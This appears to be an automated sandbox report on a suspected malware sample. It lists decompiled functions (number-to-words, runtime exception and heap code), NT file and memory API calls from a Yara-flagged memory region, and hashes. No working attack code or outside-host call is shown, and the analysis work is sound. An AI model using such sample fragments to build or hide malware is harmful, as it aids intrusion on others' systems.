                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v45 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v168 = 0;
                                                				_t163 = E012387A0( &_v167, 0, 0x31);
                                                				_t294 = _t293 + 0xc;
                                                				asm("cvttsd2si eax, [ebp+0x8]");
                                                				_v16 = _t163;
                                                				asm("cdq");
                                                				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
                                                				asm("cdq");
                                                				_v16 = _v16 / 0x3e8;
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					asm("cdq");
                                                					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
                                                					asm("cdq");
                                                					_v16 = _v16 / 0x64;
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v36 =  *(_t292 + 0xffffffffffffffa4);
                                                				asm("cdq");
                                                				_v20 = _v36 / 0x64;
                                                				asm("cdq");
                                                				_v12 = _v36 % 0x64;
                                                				asm("cdq");
                                                				_v40 = _v12 / 0xa;
                                                				_t177 = _v12;
                                                				asm("cdq");
                                                				_t178 = _t177 / 0xa;
                                                				_v44 = _t177 % 0xa;
                                                				if(_v12 >= 0x14 || _v20 == 0) {
                                                					if(_v12 >= 0x14 || _v20 != 0) {
                                                						if(_v12 <= 0x14 || _v20 == 0) {
                                                							E01231E50(_t178, _v40,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 8;
                                                						} else {
                                                							E01231E40(_v20, _v20,  &_v32);
                                                							E01238140( &_v64, "Hundred ");
                                                							E01231E50(_v40, _v40,  &_v92);
                                                							E01238140( &_v64,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 0x18;
                                                						}
                                                					} else {
                                                						E01231E40( &_v32, _v12,  &_v32);
                                                					}
                                                				} else {
                                                					E01231E40(_v20, _v20,  &_v32);
                                                					E01238140( &_v64, "Hundred ");
                                                					E01231E40(_v12, _v12,  &_v32);
                                                					E01238140( &_v64,  &_v32);
                                                					_t294 = _t294 + 0x10;
                                                				}
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
                                                						asm("cdq");
                                                						E01231E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
                                                						asm("cdq");
                                                						E01231E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
                                                						E01238140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
                                                						_t294 = _t294 + 8;
                                                					} else {
                                                						E01231E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
                                                					}
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v8 = 0;
                                                				while(_v8 < 5) {
                                                					_t189 = E012382C0(_t292 + _v8 * 0x1e - 0x13c);
                                                					_t294 = _t294 + 4;
                                                					_v68 = _t189;
                                                					if(_v68 != 0) {
                                                						E01238140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
                                                						E01238140( &_v168,  &_v80);
                                                						_t294 = _t294 + 0x10;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E01238140(_a12,  &_v64);
                                                				_t186 = E012382C0(_a12);
                                                				 *((char*)(_a12 + _t186 - 1)) = 0;
                                                				return _t186;
                                                			}


































                                                0x01231b39
                                                0x01231b3f
                                                0x01231b42
                                                0x01231b45
                                                0x01231b48
                                                0x01231b4b
                                                0x01231b4f
                                                0x01231b52
                                                0x01231b58
                                                0x01231b5b
                                                0x01231b5e
                                                0x01231b61
                                                0x01231b73
                                                0x01231b78
                                                0x01231b7b
                                                0x01231b80
                                                0x01231b86
                                                0x01231b96
                                                0x01231b9d
                                                0x01231ba5
                                                0x01231ba8
                                                0x01231bba
                                                0x01231bc3
                                                0x01231bce
                                                0x01231bd5
                                                0x01231bdd
                                                0x01231bb7
                                                0x01231bb7
                                                0x01231bee
                                                0x01231bf4
                                                0x01231bfc
                                                0x01231c02
                                                0x01231c0a
                                                0x01231c10
                                                0x01231c18
                                                0x01231c1b
                                                0x01231c1e
                                                0x01231c24
                                                0x01231c26
                                                0x01231c2d
                                                0x01231c79
                                                0x01231c97
                                                0x01231d01
                                                0x01231d0e
                                                0x01231d1b
                                                0x01231d20
                                                0x01231c9f
                                                0x01231ca7
                                                0x01231cb5
                                                0x01231cc5
                                                0x01231cd2
                                                0x01231ce2
                                                0x01231cef
                                                0x01231cf4
                                                0x01231cf4
                                                0x01231c81
                                                0x01231c89
                                                0x01231c89
                                                0x01231c35
                                                0x01231c3d
                                                0x01231c4b
                                                0x01231c5b
                                                0x01231c68
                                                0x01231c6d
                                                0x01231c6d
                                                0x01231d23
                                                0x01231d35
                                                0x01231d43
                                                0x01231d63
                                                0x01231d6c
                                                0x01231d7c
                                                0x01231d85
                                                0x01231d9c
                                                0x01231da1
                                                0x01231d45
                                                0x01231d51
                                                0x01231d51
                                                0x01231d32
                                                0x01231d32
                                                0x01231da6
                                                0x01231db8
                                                0x01231dcc
                                                0x01231dd1
                                                0x01231dd4
                                                0x01231ddb
                                                0x01231df2
                                                0x01231e05
                                                0x01231e0a
                                                0x01231e0a
                                                0x01231db5
                                                0x01231db5
                                                0x01231e17
                                                0x01231e23
                                                0x01231e2e
                                                0x01231e36

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _memset
                                                • String ID: Hundred $Hundred
                                                • API String ID: 2102423945-1478457770
                                                • Opcode ID: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction ID: bf70320638243ae354252fbc0b49d0d291aebe6d83daf9c5f2d28ace7bd73fee
                                                • Opcode Fuzzy Hash: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction Fuzzy Hash: CBA162F1E10209EFCF08DFE8D881BEDB7B6AF98300F108569E515A7240EB759A15CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0123F71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                				intOrPtr* _v20;
                                                				void* _t4;
                                                				intOrPtr* _t7;
                                                				intOrPtr _t9;
                                                
                                                				_t15 = __edx;
                                                				_t13 = __ebx;
                                                				_t4 = E01243C1F(0, 0x10000, 0x30000);
                                                				if(_t4 != 0) {
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					E01238B87(__ebx, __edx);
                                                					asm("int3");
                                                					_t7 =  *_v20;
                                                					__eflags =  *_t7 - 0xe06d7363;
                                                					if( *_t7 != 0xe06d7363) {
                                                						L9:
                                                						__eflags = 0;
                                                						return 0;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
                                                						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
                                                							goto L9;
                                                						} else {
                                                							_t9 =  *((intOrPtr*)(_t7 + 0x14));
                                                							__eflags = _t9 - 0x19930520;
                                                							if(__eflags == 0) {
                                                								L10:
                                                								E0123C6A9(_t13, _t15, 0, __eflags);
                                                								asm("int3");
                                                								E0123C080(E0123F743);
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								__eflags = _t9 - 0x19930521;
                                                								if(__eflags == 0) {
                                                									goto L10;
                                                								} else {
                                                									__eflags = _t9 - 0x19930522;
                                                									if(__eflags == 0) {
                                                										goto L10;
                                                									} else {
                                                										__eflags = _t9 - 0x1994000;
                                                										if(__eflags == 0) {
                                                											goto L10;
                                                										} else {
                                                											goto L9;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t4;
                                                				}
                                                			}







                                                0x0123f71c
                                                0x0123f71c
                                                0x0123f72a
                                                0x0123f734
                                                0x0123f738
                                                0x0123f739
                                                0x0123f73a
                                                0x0123f73b
                                                0x0123f73c
                                                0x0123f73d
                                                0x0123f742
                                                0x0123f749
                                                0x0123f74b
                                                0x0123f751
                                                0x0123f778
                                                0x0123f778
                                                0x0123f77b
                                                0x0123f753
                                                0x0123f753
                                                0x0123f757
                                                0x00000000
                                                0x0123f759
                                                0x0123f759
                                                0x0123f75c
                                                0x0123f761
                                                0x0123f77e
                                                0x0123f77e
                                                0x0123f783
                                                0x0123f789
                                                0x0123f78f
                                                0x0123f791
                                                0x0123f763
                                                0x0123f763
                                                0x0123f768
                                                0x00000000
                                                0x0123f76a
                                                0x0123f76a
                                                0x0123f76f
                                                0x00000000
                                                0x0123f771
                                                0x0123f771
                                                0x0123f776
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123f776
                                                0x0123f76f
                                                0x0123f768
                                                0x0123f761
                                                0x0123f757
                                                0x0123f736
                                                0x0123f737
                                                0x0123f737

                                                APIs
                                                • __controlfp_s.LIBCMT ref: 0123F72A
                                                  • Part of subcall function 01243C1F: __control87.LIBCMT ref: 01243C43
                                                • __invoke_watson.LIBCMT ref: 0123F73D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __control87__controlfp_s__invoke_watson
                                                • String ID: csm
                                                • API String ID: 1371525046-1018135373
                                                • Opcode ID: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction ID: cac245fbcc987b2affc1d2901390355be7cad308c80296496929e8e2425ef860
                                                • Opcode Fuzzy Hash: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction Fuzzy Hash: 1DF024F19303071B8B2F996DBB44ABE378D9FE0111FA40512E708CE521DB10C681C0D7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E019DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = L0198CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E019D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E019D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}










                                                0x019dfdda
                                                0x019dfde2
                                                0x019dfde5
                                                0x019dfdec
                                                0x019dfdfa
                                                0x019dfdff
                                                0x019dfe0a
                                                0x019dfe0f
                                                0x019dfe17
                                                0x019dfe1e
                                                0x019dfe19
                                                0x019dfe19
                                                0x019dfe19
                                                0x019dfe20
                                                0x019dfe21
                                                0x019dfe22
                                                0x019dfe25
                                                0x019dfe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019DFDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019DFE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019DFE01
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 8ba2f84d3f04a299f861fbd99f53972d36e9adfc681113ebc2d578b84c3fbff7
                                                • Instruction ID: 867677f9d7b9c7b8c7bb07907229dc2ba32d865598fab6eceeb680f9494baf74
                                                • Opcode Fuzzy Hash: 8ba2f84d3f04a299f861fbd99f53972d36e9adfc681113ebc2d578b84c3fbff7
                                                • Instruction Fuzzy Hash: 2AF0C232600201BBEA241A45DC02F23BB6AEB84B30F258214F62C561D1DA62F82087B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E01236B80(void* __ecx) {
                                                				void* _v8;
                                                				void* _t5;
                                                				void* _t7;
                                                				void* _t14;
                                                
                                                				_t14 = __ecx;
                                                				_push(__ecx);
                                                				_t5 = HeapAlloc(GetProcessHeap(), 1, 0x17d78400);
                                                				_v8 = _t5;
                                                				_push(_t5);
                                                				if(_t5 != 0x11) {
                                                					asm("cld");
                                                				}
                                                				asm("clc");
                                                				_pop(_t7);
                                                				if(_v8 != 0) {
                                                					E01236C50(_t14, _v8, 0x17d78400);
                                                					_push(_t11);
                                                					asm("cld");
                                                					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
                                                				}
                                                				return _t7;
                                                			}







                                                0x01236b80
                                                0x01236b83
                                                0x01236b93
                                                0x01236b99
                                                0x01236b9c
                                                0x01236ba0
                                                0x01236ba4
                                                0x01236ba5
                                                0x01236ba9
                                                0x01236baa
                                                0x01236baf
                                                0x01236bbd
                                                0x01236bc2
                                                0x01236bc7
                                                0x01236bd4
                                                0x01236bd4
                                                0x01236bde

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                • HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                • HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction ID: 9dae238677a1239a02aa92dfad56ca1e7c34d6a8839d004e10bf93faf7fc9f44
                                                • Opcode Fuzzy Hash: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction Fuzzy Hash: B8F0E2B5560618BFE7106AF8BC0DFABB79CE704309F201544F604D3240D5B25A008B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 0036A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: MK6
                                                • API String ID: 2738559852-1530184918
                                                • Opcode ID: 2f198d2c5fe3cab3cdbd9ed426046529e3e86ab704c84d7408bbc02f3ea236ba
                                                • Instruction ID: 71384396ca1d7bd9af02c4dd8c5528e396392e0ab23d7e64caad5f73dc7a1bec
                                                • Opcode Fuzzy Hash: 2f198d2c5fe3cab3cdbd9ed426046529e3e86ab704c84d7408bbc02f3ea236ba
                                                • Instruction Fuzzy Hash: 490129B2200104AFCB14DF98DC95EEB77A9EF8C354F058659BA1DAB241D630E9118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369F7D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 66076dbd17308d0b13fada632bb51caf6c5f76a89df2a804aebec32c10db7623
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 13F0B2B2210208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL( M6,?,?,00364D20,00000000,FFFFFFFF), ref: 0036A085
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: M6
                                                • API String ID: 3535843008-1298217763
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 9df31d787f6e2c4d108096b667b0fd6b7cfa933b88ddf443f99b2c0bb1640411
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: 3BD01776200214ABD710EB98CC85FA77BADEF48760F158599BA18AB242C570FA008AE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 0036A149
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: c351b108c95beed28844e6bcbf042d29916cb63c099533faf6bf3cac35903671
                                                • Instruction ID: 32e43027325b75291671a3d7bbdae94a203e1c89b196b770cfe8f1f5a8849532
                                                • Opcode Fuzzy Hash: c351b108c95beed28844e6bcbf042d29916cb63c099533faf6bf3cac35903671
                                                • Instruction Fuzzy Hash: E3113AB6200108AFDB14DF99CC81EEB77ADEF89350F158248FE09A7241C630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 0036A025
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 89860f9f79cba53636d4ff4ff0a0f1da0634c7be86dad85901734ccb60623c9b
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: DFF0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158248BE1DA7241D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 0036A025
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 44288736e92017c9448e1bb6f29f1988f5e4c650516a4e17b86a1c218d2c7458
                                                • Instruction ID: b918beca1f6690d480316562cd1ecc7025f0e4515b51b6e380e8746cef0c8855
                                                • Opcode Fuzzy Hash: 44288736e92017c9448e1bb6f29f1988f5e4c650516a4e17b86a1c218d2c7458
                                                • Instruction Fuzzy Hash: 2BF0A5B2210108AFCB04DF99DC90EEB77ADAF8C314F168249FE1DE7245C630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 0036A149
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 0be28a7f3c28dd71a496608cebb81c5e12cb20bd006f01469d701d0924bdb026
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 86F015B2210208ABCB14DF89CC81EAB77ADAF88750F118248BE08A7241C630F811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5418c0e1de9bd3d100e98e1a624892aa9afb19347cdd0ceeb0772f5ae87db6b9
                                                • Instruction ID: a0b430941a78cf2bcdd3d5834b02dc05fb0d4520bb5f8cfd70213bc0f707476d
                                                • Opcode Fuzzy Hash: 5418c0e1de9bd3d100e98e1a624892aa9afb19347cdd0ceeb0772f5ae87db6b9
                                                • Instruction Fuzzy Hash: 9C90026139180442D200656A4C19B57000A97D0383F91D115A0244554CCD558861A561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7008b787aeb655b8a0a091a380c828a9ebc2461185c1e5983ba7b03c8a442dcc
                                                • Instruction ID: 9dbb8fa86a617ca5ce2d1b8cd22e17ed1b835e7c794ffb35d2c68d652d170152
                                                • Opcode Fuzzy Hash: 7008b787aeb655b8a0a091a380c828a9ebc2461185c1e5983ba7b03c8a442dcc
                                                • Instruction Fuzzy Hash: A390027138100813D111615A4909757000E97D02C1FD1D412A0514558DDA968952F161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14373ab6473ad44b2f0fcd7034ea9d72b92f8c3377f10ab7f763301b14452e97
                                                • Instruction ID: a85a5dde94d30c882b3b9ce47418eb1f629dcd4d2579ecd7629de1540c0a5d8d
                                                • Opcode Fuzzy Hash: 14373ab6473ad44b2f0fcd7034ea9d72b92f8c3377f10ab7f763301b14452e97
                                                • Instruction Fuzzy Hash: 569002613C2045525545B15A4809557400BA7E02C17D1D012A1504950CC9669856E661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0cbcf651588a58280e7e43e9c5388dbb5ea7dc67d266cfce0e37aafda8558276
                                                • Instruction ID: e2c67577275cc292ff454a4be48666c9d6393e84e110cdf266f86326285f2d2f
                                                • Opcode Fuzzy Hash: 0cbcf651588a58280e7e43e9c5388dbb5ea7dc67d266cfce0e37aafda8558276
                                                • Instruction Fuzzy Hash: FA9002A13C100842D100615A4819B57000AD7E1381F91D015E1154554DCA59CC52B166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 087fc9701a76da86c88921814a7721e143b4bcb37a2d35e2483f0863160bd9cb
                                                • Instruction ID: cfd9324932e355887b5361dc17544af27f499c2d2531dfcc559d640e75597bef
                                                • Opcode Fuzzy Hash: 087fc9701a76da86c88921814a7721e143b4bcb37a2d35e2483f0863160bd9cb
                                                • Instruction Fuzzy Hash: 379002B138100802D140715A4809797000A97D0381F91D011A5154554ECA998DD5B6A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fa13c0de0e9102e5f12a21b403aaebcccaf016747da7d8ddff50b10b5da62407
                                                • Instruction ID: a3dac79578b82db1b7e74b4c18f07601260859b77752a192cc13b4fb24b50fb2
                                                • Opcode Fuzzy Hash: fa13c0de0e9102e5f12a21b403aaebcccaf016747da7d8ddff50b10b5da62407
                                                • Instruction Fuzzy Hash: 8290027138108C02D110615A880979B000A97D0381F95D411A4514658DCAD58891B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f1d2c347db46b1db7c5dd154e085273944a7c0f250ba05493c9498ae036defed
                                                • Instruction ID: eb8dcd07ca13c115cae15839f465a4a413b0b7513a7b3bdde81500e6a5353979
                                                • Opcode Fuzzy Hash: f1d2c347db46b1db7c5dd154e085273944a7c0f250ba05493c9498ae036defed
